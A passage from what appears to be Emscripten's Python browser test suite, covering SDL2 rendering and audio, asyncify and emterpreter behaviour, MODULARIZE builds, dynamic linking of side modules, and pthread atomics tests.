self.btest('sdl2glshader.c', reference='sdlglshader.png', args=['-s', 'USE_SDL=2', '-O2', '-s', 'LEGACY_GL_EMULATION=1'], also_proxied=True) # XXX closure fails on proxy
@requires_graphics_hardware
def test_sdl2_canvas_blank(self):
self.btest('sdl2_canvas_blank.c', reference='sdl_canvas_blank.png', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_canvas_palette(self):
self.btest('sdl2_canvas_palette.c', reference='sdl_canvas_palette.png', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_canvas_twice(self):
self.btest('sdl2_canvas_twice.c', reference='sdl_canvas_twice.png', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gfx(self):
self.btest('sdl2_gfx.cpp', args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_GFX=2'], reference='sdl2_gfx.png', reference_slack=2)
@requires_graphics_hardware
def test_sdl2_canvas_palette_2(self):
create_test_file('args-r.js', '''
Module['arguments'] = ['-r'];
''')
create_test_file('args-g.js', '''
Module['arguments'] = ['-g'];
''')
create_test_file('args-b.js', '''
Module['arguments'] = ['-b'];
''')
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-r.js'])
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-g.js'])
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-b.js'])
def test_sdl2_swsurface(self):
self.btest('sdl2_swsurface.c', expected='1', args=['-s', 'USE_SDL=2', '-s', 'TOTAL_MEMORY=64MB'])
@requires_graphics_hardware
def test_sdl2_image_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl2_image_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2'], manually_trigger_reftest=True)
@requires_graphics_hardware
def test_sdl2_image_prepare_data(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl2_image_prepare_data.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2'], manually_trigger_reftest=True)
@requires_graphics_hardware
def test_sdl2_canvas_proxy(self):
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function assert(x, y) { if (!x) throw 'assertion failed ' + y }
%s
var windowClose = window.close;
window.close = function() {
// wait for rafs to arrive and the screen to update before reftesting
setTimeout(function() {
doReftest();
setTimeout(windowClose, 5000);
}, 1000);
};
</script>
</body>''' % open('reftest.js').read())
create_test_file('test.html', html)
create_test_file('data.txt', 'datum')
self.btest('sdl2_canvas_proxy.c', reference='sdl2_canvas.png', args=['-s', 'USE_SDL=2', '--proxy-to-worker', '--preload-file', 'data.txt', '-s', 'GL_TESTING=1'], manual_reference=True, post_build=post)
def test_sdl2_pumpevents(self):
# key events should be detected using SDL_PumpEvents
create_test_file('pre.js', '''
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
self.btest('sdl2_pumpevents.c', expected='7', args=['--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
def test_sdl2_timer(self):
self.btest('sdl2_timer.c', expected='5', args=['-s', 'USE_SDL=2'])
def test_sdl2_canvas_size(self):
self.btest('sdl2_canvas_size.c', expected='1', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gl_read(self):
# SDL, OpenGL, readPixels
create_test_file('sdl2_gl_read.c', self.with_report_result(open(path_from_root('tests', 'sdl2_gl_read.c')).read()))
self.compile_btest(['sdl2_gl_read.c', '-o', 'something.html', '-s', 'USE_SDL=2'])
self.run_browser('something.html', '.', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_fog_simple(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_simple.c', reference='screenshot-fog-simple.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_negative(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_negative.c', reference='screenshot-fog-negative.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_density(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_density.c', reference='screenshot-fog-density.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_exp2(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_exp2.c', reference='screenshot-fog-exp2.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_linear(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_linear.c', reference='screenshot-fog-linear.png', reference_slack=1,
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
def test_sdl2_unwasteful(self):
self.btest('sdl2_unwasteful.cpp', expected='1', args=['-s', 'USE_SDL=2', '-O1'])
def test_sdl2_canvas_write(self):
self.btest('sdl2_canvas_write.cpp', expected='0', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gl_frames_swap(self):
def post_build(*args):
self.post_manual_reftest(*args)
html = open('test.html').read()
html2 = html.replace('''Module['postRun'] = doReftest;''', '') # we don't want the very first frame
assert html != html2
create_test_file('test.html', html2)
self.btest('sdl2_gl_frames_swap.c', reference='sdl2_gl_frames_swap.png', args=['--proxy-to-worker', '-s', 'GL_TESTING=1', '-s', 'USE_SDL=2'], manual_reference=True, post_build=post_build)
@requires_graphics_hardware
def test_sdl2_ttf(self):
shutil.copy2(path_from_root('tests', 'freetype', 'LiberationSansBold.ttf'), self.get_dir())
self.btest('sdl2_ttf.c', reference='sdl2_ttf.png',
args=['-O2', '-s', 'USE_SDL=2', '-s', 'USE_SDL_TTF=2', '--embed-file', 'LiberationSansBold.ttf'],
message='You should see colorful "hello" and "world" in the window')
def test_sdl2_custom_cursor(self):
shutil.copyfile(path_from_root('tests', 'cursor.bmp'), 'cursor.bmp')
self.btest('sdl2_custom_cursor.c', expected='1', args=['--preload-file', 'cursor.bmp', '-s', 'USE_SDL=2'])
def test_sdl2_misc(self):
self.btest('sdl2_misc.c', expected='1', args=['-s', 'USE_SDL=2'])
print('also test building to object files first')
src = open(path_from_root('tests', 'sdl2_misc.c')).read()
create_test_file('test.c', self.with_report_result(src))
run_process([PYTHON, EMCC, 'test.c', '-s', 'USE_SDL=2', '-o', 'test.o'])
self.compile_btest(['test.o', '-s', 'USE_SDL=2', '-o', 'test.html'])
self.run_browser('test.html', '...', '/report_result?1')
@requires_sound_hardware
def test_sdl2_mixer(self):
shutil.copyfile(path_from_root('tests', 'sounds', 'alarmvictory_1.ogg'), 'sound.ogg')
self.btest('sdl2_mixer.c', expected='1', args=['--preload-file', 'sound.ogg', '-s', 'USE_SDL=2', '-s', 'USE_SDL_MIXER=2', '-s', 'TOTAL_MEMORY=33554432'])
@requires_sound_hardware
def test_sdl2_mixer_wav(self):
shutil.copyfile(path_from_root('tests', 'sounds', 'the_entertainer.wav'), 'sound.wav')
self.btest('sdl2_mixer_wav.c', expected='1', args=['--preload-file', 'sound.wav', '-s', 'USE_SDL=2', '-s', 'USE_SDL_MIXER=2', '-s', 'TOTAL_MEMORY=33554432'])
@no_wasm_backend('cocos2d needs to be ported')
@requires_graphics_hardware
def test_cocos2d_hello(self):
cocos2d_root = os.path.join(system_libs.Ports.get_build_dir(), 'cocos2d')
preload_file = os.path.join(cocos2d_root, 'samples', 'HelloCpp', 'Resources') + '@'
self.btest('cocos2d_hello.cpp', reference='cocos2d_hello.png', reference_slack=1,
args=['-s', 'USE_COCOS2D=3', '-s', 'ERROR_ON_UNDEFINED_SYMBOLS=0', '--std=c++11',
'--preload-file', preload_file, '--use-preload-plugins',
'-Wno-inconsistent-missing-override'],
message='You should see Cocos2d logo')
def test_async(self):
for opts in [0, 1, 2, 3]:
print(opts)
self.btest('browser/async.cpp', '1', args=['-O' + str(opts), '-g2'] + self.get_async_args())
@no_fastcomp('emterpretify is not compatible with threads')
@requires_threads
def test_async_in_pthread(self):
self.btest('browser/async.cpp', '1', args=self.get_async_args() + ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-g'])
def test_async_2(self):
# Error.stackTraceLimit default to 10 in chrome but this test relies on more
# than 40 stack frames being reported.
create_test_file('pre.js', 'Error.stackTraceLimit = 80;\n')
self.btest('browser/async_2.cpp', '40', args=['-O3', '--pre-js', 'pre.js'] + self.get_async_args())
def test_async_virtual(self):
for opts in [0, 3]:
print(opts)
self.btest('browser/async_virtual.cpp', '5', args=['-O' + str(opts), '-profiling'] + self.get_async_args())
def test_async_virtual_2(self):
for opts in [0, 3]:
print(opts)
self.btest('browser/async_virtual_2.cpp', '1', args=['-O' + str(opts), '-s', 'ASSERTIONS=1', '-s', 'SAFE_HEAP=1', '-profiling'] + self.get_async_args())
# Test async sleeps in the presence of invoke_* calls, which can happen with
# longjmp or exceptions.
@parameterized({
'O0': ([],), # noqa
'O3': (['-O3'],), # noqa
})
def test_async_longjmp(self, args):
self.btest('browser/async_longjmp.cpp', '2', args=args + self.get_async_args())
@no_wasm_backend('emterpretify, with emterpreter-specific error logging')
def test_emterpreter_async_bad(self):
for opts in [0, 3]:
print(opts)
self.btest('emterpreter_async_bad.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts), '-s', 'EMTERPRETIFY_BLACKLIST=["_middle"]', '-s', 'ASSERTIONS=1'])
@no_wasm_backend('emterpretify, with emterpreter-specific error logging')
def test_emterpreter_async_bad_2(self):
for opts in [0, 3]:
for assertions in [0, 1]:
# without assertions, we end up continuing to run more non-emterpreted code in this testcase, returning 1
# with assertions, we hit the emterpreter-async assertion on that, and report a clear error
expected = '2' if assertions else '1'
print(opts, assertions, expected)
self.btest('emterpreter_async_bad_2.cpp', expected, args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts), '-s', 'EMTERPRETIFY_BLACKLIST=["_middle"]', '-s', 'ASSERTIONS=%s' % assertions, '-g'])
def test_async_mainloop(self):
for opts in [0, 3]:
print(opts)
self.btest('browser/async_mainloop.cpp', '121', args=['-O' + str(opts)] + self.get_async_args())
@no_wasm_backend('emterpretify - specific behavior wrt other async calls being paused or not')
def test_emterpreter_async_with_manual(self):
for opts in [0, 3]:
print(opts)
self.btest('emterpreter_async_with_manual.cpp', '121', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts), '-s', 'EMTERPRETIFY_BLACKLIST=["_acall"]'])
@no_wasm_backend('emterpretify - yielding behavior')
def test_emterpreter_async_sleep2(self):
self.btest('emterpreter_async_sleep2.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-Oz'])
@no_wasm_backend('emterpretify - safe-heap specific issues')
def test_emterpreter_async_sleep2_safeheap(self):
# check that safe-heap machinery does not cause errors in async operations
self.btest('emterpreter_async_sleep2_safeheap.cpp', '17', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-Oz', '-profiling', '-s', 'SAFE_HEAP=1', '-s', 'ASSERTIONS=1', '-s', 'EMTERPRETIFY_WHITELIST=["_main","_callback","_fix"]', '-s', 'EXIT_RUNTIME=1'])
@requires_sound_hardware
def test_sdl_audio_beep_sleep(self):
self.btest('sdl_audio_beep_sleep.cpp', '1', args=['-Os', '-s', 'ASSERTIONS=1', '-s', 'DISABLE_EXCEPTION_CATCHING=0', '-profiling', '-s', 'SAFE_HEAP=1', '-lSDL'] + self.get_async_args(), timeout=90)
def test_mainloop_reschedule(self):
self.btest('mainloop_reschedule.cpp', '1', args=['-Os'] + self.get_async_args())
def test_mainloop_infloop(self):
self.btest('mainloop_infloop.cpp', '1', args=self.get_async_args())
def test_async_iostream(self):
self.btest('browser/async_iostream.cpp', '1', args=self.get_async_args())
# Test an async return value. The value goes through a custom JS library
# method that uses asyncify, and therefore it needs to be declared in
# ASYNCIFY_IMPORTS.
# To make the test more precise we also use ASYNCIFY_IGNORE_INDIRECT here.
@parameterized({
'normal': (['-s', 'ASYNCIFY_IMPORTS=["sync_tunnel"]'],), # noqa
'response': (['-s', 'ASYNCIFY_IMPORTS=@filey.txt'],), # noqa
'nothing': (['-DBAD'],), # noqa
'empty_list': (['-DBAD', '-s', 'ASYNCIFY_IMPORTS=[]'],), # noqa
'em_js_bad': (['-DBAD', '-DUSE_EM_JS'],), # noqa
})
@no_fastcomp('emterpretify never worked here')
def test_async_returnvalue(self, args):
if '@' in str(args):
create_test_file('filey.txt', '["sync_tunnel"]')
self.btest('browser/async_returnvalue.cpp', '0', args=['-s', 'ASYNCIFY', '-s', 'ASYNCIFY_IGNORE_INDIRECT', '--js-library', path_from_root('tests', 'browser', 'async_returnvalue.js')] + args + ['-s', 'ASSERTIONS=1'])
@no_fastcomp('wasm backend asyncify specific')
def test_async_stack_overflow(self):
self.btest('browser/async_stack_overflow.cpp', '0', args=['-s', 'ASYNCIFY', '-s', 'ASYNCIFY_STACK_SIZE=4'])
@no_fastcomp('wasm backend asyncify specific')
def test_async_bad_whitelist(self):
self.btest('browser/async_bad_whitelist.cpp', '0', args=['-s', 'ASYNCIFY', '-s', 'ASYNCIFY_WHITELIST=["waka"]', '--profiling'])
# Tests that when building with -s MINIMAL_RUNTIME=1, the build can use -s MODULARIZE=1 as well.
@no_wasm_backend('MINIMAL_RUNTIME not yet for wasm backend')
def test_minimal_runtime_modularize(self):
create_test_file('src.cpp', self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
self.compile_btest(['src.cpp', '-o', 'test.html', '-s', 'MODULARIZE=1', '-s', 'MINIMAL_RUNTIME=1'])
self.run_browser('test.html', None, '/report_result?0')
@requires_sync_compilation
def test_modularize(self):
for opts in [[], ['-O1'], ['-O2', '-profiling'], ['-O2'], ['-O2', '--closure', '1']]:
for args, code in [
([], 'Module();'), # defaults
# use EXPORT_NAME
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
if (typeof Module !== "undefined") throw "what?!"; // do not pollute the global scope, we are modularized!
HelloWorld.noInitialRun = true; // errorneous module capture will load this and cause timeout
HelloWorld();
'''),
# pass in a Module option (which prevents main(), which we then invoke ourselves)
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
var hello = HelloWorld({ noInitialRun: true, onRuntimeInitialized: function() {
setTimeout(function() { hello._main(); }); // must be async, because onRuntimeInitialized may be called synchronously, so |hello| is not yet set!
} });
'''),
# similar, but without a mem init file, everything is sync and simple
(['-s', 'EXPORT_NAME="HelloWorld"', '--memory-init-file', '0'], '''
var hello = HelloWorld({ noInitialRun: true});
hello._main();
'''),
# use the then() API
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
HelloWorld({ noInitialRun: true }).then(function(hello) {
hello._main();
});
'''),
# then() API, also note the returned value
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
var helloOutside = HelloWorld({ noInitialRun: true }).then(function(hello) {
setTimeout(function() {
hello._main();
if (hello !== helloOutside) throw 'helloOutside has not been set!'; // as we are async, helloOutside must have been set
});
});
'''),
]:
print('test on', opts, args, code)
src = open(path_from_root('tests', 'browser_test_hello_world.c')).read()
create_test_file('test.c', self.with_report_result(src))
# this test is synchronous, so avoid async startup due to wasm features
self.compile_btest(['test.c', '-s', 'MODULARIZE=1', '-s', 'WASM_ASYNC_COMPILATION=0', '-s', 'SINGLE_FILE=1'] + args + opts)
create_test_file('a.html', '''
<script src="a.out.js"></script>
<script>
%s
</script>
''' % code)
self.run_browser('a.html', '...', '/report_result?0')
# test illustrating the regression on the modularize feature since commit c5af8f6
# when compiling with the --preload-file option
@no_wasm_backend('cannot customize TOTAL_MEMORY in wasm at runtime')
def test_modularize_and_preload_files(self):
# amount of memory different from the default one that will be allocated for the emscripten heap
totalMemory = 33554432
for opts in [[], ['-O1'], ['-O2', '-profiling'], ['-O2'], ['-O2', '--closure', '1']]:
# the main function simply checks that the amount of allocated heap memory is correct
src = r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
EM_ASM({
// use eval here in order for the test with closure compiler enabled to succeed
var totalMemory = Module['TOTAL_MEMORY'];
assert(totalMemory === %d, 'bad memory size');
});
REPORT_RESULT(0);
return 0;
}
''' % totalMemory
create_test_file('test.c', self.with_report_result(src))
# generate a dummy file
create_test_file('dummy_file', 'dummy')
# compile the code with the modularize feature and the preload-file option enabled
# no wasm, since this tests customizing total memory at runtime
self.compile_btest(['test.c', '-s', 'WASM=0', '-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME="Foo"', '--preload-file', 'dummy_file'] + opts)
create_test_file('a.html', '''
<script src="a.out.js"></script>
<script>
// instantiate the Foo module with custom TOTAL_MEMORY value
var foo = Foo({ TOTAL_MEMORY: %d });
</script>
''' % totalMemory)
self.run_browser('a.html', '...', '/report_result?0')
def test_webidl(self):
# see original in test_core.py
run_process([PYTHON, path_from_root('tools', 'webidl_binder.py'),
path_from_root('tests', 'webidl', 'test.idl'),
'glue'])
self.assertExists('glue.cpp')
self.assertExists('glue.js')
for opts in [[], ['-O1'], ['-O2']]:
print(opts)
self.btest(os.path.join('webidl', 'test.cpp'), '1', args=['--post-js', 'glue.js', '-I.', '-DBROWSER'] + opts)
@requires_sync_compilation
def test_dynamic_link(self):
create_test_file('pre.js', '''
Module.dynamicLibraries = ['side.wasm'];
''')
create_test_file('main.cpp', r'''
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <emscripten.h>
char *side(const char *data);
int main() {
char *temp = side("hello through side\n");
char *ret = (char*)malloc(strlen(temp)+1);
strcpy(ret, temp);
temp[1] = 'x';
EM_ASM({
Module.realPrint = out;
out = function(x) {
if (!Module.printed) Module.printed = x;
Module.realPrint(x);
};
});
puts(ret);
EM_ASM({ assert(Module.printed === 'hello through side', ['expected', Module.printed]); });
REPORT_RESULT(2);
return 0;
}
''')
create_test_file('side.cpp', r'''
#include <stdlib.h>
#include <string.h>
char *side(const char *data);
char *side(const char *data) {
char *ret = (char*)malloc(strlen(data)+1);
strcpy(ret, data);
return ret;
}
''')
run_process([PYTHON, EMCC, 'side.cpp', '-s', 'SIDE_MODULE=1', '-O2', '-o', 'side.wasm', '-s', 'EXPORT_ALL=1'])
self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE=1', '-O2', '--pre-js', 'pre.js', '-s', 'EXPORT_ALL=1'])
print('wasm in worker (we can read binary data synchronously there)')
create_test_file('pre.js', '''
var Module = { dynamicLibraries: ['side.wasm'] };
''')
run_process([PYTHON, EMCC, 'side.cpp', '-s', 'SIDE_MODULE=1', '-O2', '-o', 'side.wasm', '-s', 'WASM=1', '-s', 'EXPORT_ALL=1'])
self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE=1', '-O2', '--pre-js', 'pre.js', '-s', 'WASM=1', '--proxy-to-worker', '-s', 'EXPORT_ALL=1'])
print('wasm (will auto-preload since no sync binary reading)')
create_test_file('pre.js', '''
Module.dynamicLibraries = ['side.wasm'];
''')
# same wasm side module works
self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE=1', '-O2', '--pre-js', 'pre.js', '-s', 'WASM=1', '-s', 'EXPORT_ALL=1'])
# verify that dynamic linking works in all kinds of in-browser environments.
# don't mix different kinds in a single test.
def test_dylink_dso_needed_wasm(self):
self._test_dylink_dso_needed(1, 0)
def test_dylink_dso_needed_wasm_inworker(self):
self._test_dylink_dso_needed(1, 1)
def test_dylink_dso_needed_asmjs(self):
self._test_dylink_dso_needed(0, 0)
def test_dylink_dso_needed_asmjs_inworker(self):
self._test_dylink_dso_needed(0, 1)
@no_wasm_backend('https://github.com/emscripten-core/emscripten/issues/8753')
@requires_sync_compilation
def _test_dylink_dso_needed(self, wasm, inworker):
# here we reuse runner._test_dylink_dso_needed, but the code is run via browser.
print('\n# wasm=%d inworker=%d' % (wasm, inworker))
self.set_setting('WASM', wasm)
self.emcc_args += ['-O2']
def do_run(src, expected_output):
# XXX there is no infrastructure (yet ?) to retrieve stdout from browser in tests.
# -> do the assert about expected output inside browser.
#
# we have to put the hook into post.js because in main it is too late
# (in main we won't be able to catch what static constructors inside
# linked dynlibs printed), and in pre.js it is too early (out is not yet
# setup by the shell).
create_test_file('post.js', r'''
Module.realPrint = out;
out = function(x) {
if (!Module.printed) Module.printed = "";
Module.printed += x + '\n'; // out is passed str without last \n
Module.realPrint(x);
};
''')
src += r'''
int main() {
_main();
EM_ASM({
var expected = %r;
assert(Module.printed === expected, ['stdout expected:', expected]);
});
REPORT_RESULT(0);
}
''' % (expected_output,)
# --proxy-to-worker only on main
if inworker:
self.emcc_args += ['--proxy-to-worker']
self.btest(src, '0', args=self.get_emcc_args() + ['--post-js', 'post.js'])
super(browser, self)._test_dylink_dso_needed(do_run)
@requires_graphics_hardware
@requires_sync_compilation
def test_dynamic_link_glemu(self):
create_test_file('pre.js', '''
Module.dynamicLibraries = ['side.wasm'];
''')
create_test_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <assert.h>
const char *side();
int main() {
const char *exts = side();
puts(side());
assert(strstr(exts, "GL_EXT_texture_env_combine"));
REPORT_RESULT(1);
return 0;
}
''')
create_test_file('side.cpp', r'''
#include "SDL/SDL.h"
#include "SDL/SDL_opengl.h"
const char *side() {
SDL_Init(SDL_INIT_VIDEO);
SDL_SetVideoMode(600, 600, 16, SDL_OPENGL);
return (const char *)glGetString(GL_EXTENSIONS);
}
''')
run_process([PYTHON, EMCC, 'side.cpp', '-s', 'SIDE_MODULE=1', '-O2', '-o', 'side.wasm', '-lSDL', '-s', 'EXPORT_ALL=1'])
self.btest(self.in_dir('main.cpp'), '1', args=['-s', 'MAIN_MODULE=1', '-O2', '-s', 'LEGACY_GL_EMULATION=1', '-lSDL', '-lGL', '--pre-js', 'pre.js', '-s', 'EXPORT_ALL=1'])
def test_memory_growth_during_startup(self):
create_test_file('data.dat', 'X' * (30 * 1024 * 1024))
self.btest('browser_test_hello_world.c', '0', args=['-s', 'ASSERTIONS=1', '-s', 'ALLOW_MEMORY_GROWTH=1', '-s', 'TOTAL_MEMORY=16MB', '-s', 'TOTAL_STACK=16384', '--preload-file', 'data.dat'])
# pthreads tests
def prep_no_SAB(self):
create_test_file('html.html', open(path_from_root('src', 'shell_minimal.html')).read().replace('''<body>''', '''<body>
<script>
SharedArrayBuffer = undefined;
Atomics = undefined;
</script>
'''))
# Test that the emscripten_ atomics api functions work.
@parameterized({
'normal': ([],),
'closure': (['--closure', '1'],),
})
@requires_threads
def test_pthread_atomics(self, args=[]):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_atomics.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8', '-g1'] + args)
# Test 64-bit atomics.
@requires_threads
def test_pthread_64bit_atomics(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_64bit_atomics.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test 64-bit C++11 atomics.
@requires_threads
def test_pthread_64bit_cxx11_atomics(self):
for opt in [['-O0'], ['-O3']]:
for pthreads in [[], ['-s', 'USE_PTHREADS=1']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_64bit_cxx11_atomics.cpp'), expected='0', args=opt + pthreads + ['-std=c++11'])
@parameterized({
'join': ('join',),
'wait': ('wait',),
})
@requires_threads
def test_pthread_main_thread_blocking(self, name):
print('Test that we error if not ALLOW_BLOCKING_ON_MAIN_THREAD')
self.btest(path_from_root('tests', 'pthread', 'main_thread_%s.cpp' % name), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1', '-s', 'ALLOW_BLOCKING_ON_MAIN_THREAD=0'])
if name == 'join':
print('Test that by default we just warn about blocking on the main thread.')
self.btest(path_from_root('tests', 'pthread', 'main_thread_%s.cpp' % name), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
print('Test that tryjoin is fine, even if not ALLOW_BLOCKING_ON_MAIN_THREAD')
self.btest(path_from_root('tests', 'pthread', 'main_thread_join.cpp'), expected='2', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1', '-g', '-DTRY_JOIN', '-s', 'ALLOW_BLOCKING_ON_MAIN_THREAD=0'])
print('Test that tryjoin is fine, even if not ALLOW_BLOCKING_ON_MAIN_THREAD, and even without a pool')
self.btest(path_from_root('tests', 'pthread', 'main_thread_join.cpp'), expected='2', args=['-O3', '-s', 'USE_PTHREADS=1', '-g', '-DTRY_JOIN', '-s', 'ALLOW_BLOCKING_ON_MAIN_THREAD=0'])
print('Test that everything works ok when we are on a pthread.')
self.btest(path_from_root('tests', 'pthread', 'main_thread_%s.cpp' % name), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1', '-s', 'PROXY_TO_PTHREAD', '-s', 'ALLOW_BLOCKING_ON_MAIN_THREAD=0'])
# Test the old GCC atomic __sync_fetch_and_op builtin operations.
@requires_threads
def test_pthread_gcc_atomic_fetch_and_op(self):
# We need to resort to using regexes to optimize out SharedArrayBuffer when pthreads are not supported, which is brittle!
# Therefore perform very extensive testing of different codegen modes to catch any problems.
for opt in [[], ['-O1'], ['-O2'], ['-O3'], ['-O3', '-s', 'AGGRESSIVE_VARIABLE_ELIMINATION=1'], ['-Os']]:
for debug in [[], ['-g1'], ['-g2'], ['-g4']]:
for f32 in [[], ['-s', 'PRECISE_F32=1', '--separate-asm', '-s', 'WASM=0']]:
args = opt + debug + f32
print(args)
if self.is_wasm_backend() and '--separate-asm' in args or 'AGGRESSIVE_VARIABLE_ELIMINATION=1' in args:
continue
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_atomic_fetch_and_op.cpp'), expected='0', args=args + ['-s', 'TOTAL_MEMORY=64MB', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# 64 bit version of the above test.
@requires_threads
def test_pthread_gcc_64bit_atomic_fetch_and_op(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_64bit_atomic_fetch_and_op.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'], also_asmjs=True)
# Test the old GCC atomic __sync_op_and_fetch builtin operations.
@requires_threads
def test_pthread_gcc_atomic_op_and_fetch(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_atomic_op_and_fetch.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'], also_asmjs=True)
# 64 bit version of the above test.
@requires_threads
def test_pthread_gcc_64bit_atomic_op_and_fetch(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_64bit_atomic_op_and_fetch.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'], also_asmjs=True)
# Tests the rest of the remaining GCC atomics after the two above tests.
@requires_threads
def test_pthread_gcc_atomics(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_atomics.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test the __sync_lock_test_and_set and __sync_lock_release primitives.
@requires_threads
def test_pthread_gcc_spinlock(self):
for arg in [[], ['-DUSE_EMSCRIPTEN_INTRINSICS']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_spinlock.cpp'), expected='800', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'] + arg, also_asmjs=True)
# Test that basic thread creation works.
@requires_threads
def test_pthread_create(self):
def test(args):
print(args)
